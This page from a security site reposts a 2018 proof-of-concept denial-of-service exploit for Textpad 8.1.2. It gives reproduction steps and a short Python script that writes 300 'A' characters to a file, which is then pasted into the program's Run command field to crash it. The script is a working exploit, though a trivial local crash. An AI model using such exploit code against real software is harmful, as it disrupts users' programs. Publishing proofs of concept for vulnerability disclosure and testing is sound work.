首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Textpad 8.1.2 Denial Of Service
来源:@Pwsecspirit 作者:Singh 发布时间:2018-08-28  
# Exploit Title:     Textpad 8.1.2 - Denial Of Service (PoC)
# Discovery by:      Shubham Singh
# Known As:          Spirited Wolf [Twitter: @Pwsecspirit]
# Youtube Channel:   www.youtube.com/c/Pentestingwithspirit 
# Discovey Date:     24-08-2018
# Homepage:          https://textpad.com
# Software Link:
# 1. For x86:        https://textpad.com/download/v81/win32/txpeng812-32.zip
# 2. For x86_64:     https://textpad.com/download/v81/x64/txpeng812-64.zip
# Tested Version:    8.1.2
# Tested on OS:      Windows 7 Ultimate 64 bit
# Steps to Reproduce:
# 1. Run the python exploit script, it will create a new file with the name "exploit.txt".
# 2. Just copy the text inside "exploit.txt" and start the program.
# 3. In the new window click "Tools" > "Run...". Now paste the content of "exploit.txt".
# 4. Into the fields:"Command". Click "OK" and you will see a crash.

#!/usr/bin/python

buffer = "A" * 300

payload = buffer
try:
    f=open("exploit.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Instagram App 41.1788.50991.0
·UltraISO 9.7.1.3519 - Buffer O
·Cisco Network Assistant 6.3.3
·HP Jetdirect - Path Traversal
·LiteCart 2.1.2 - Arbitrary Fil
·Node.JS - 'node-serialize' Rem
·Libpango 1.40.8 - Denial of Se
·Trend Micro Enterprise Mobile
·Apache Struts 2.3 < 2.3.34 / 2
·Apache Struts 2.3 < 2.3.34 / 2
·CuteFTP 5.0 - Buffer Overflow
·Firefox 55.0.3 - Denial of Ser
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved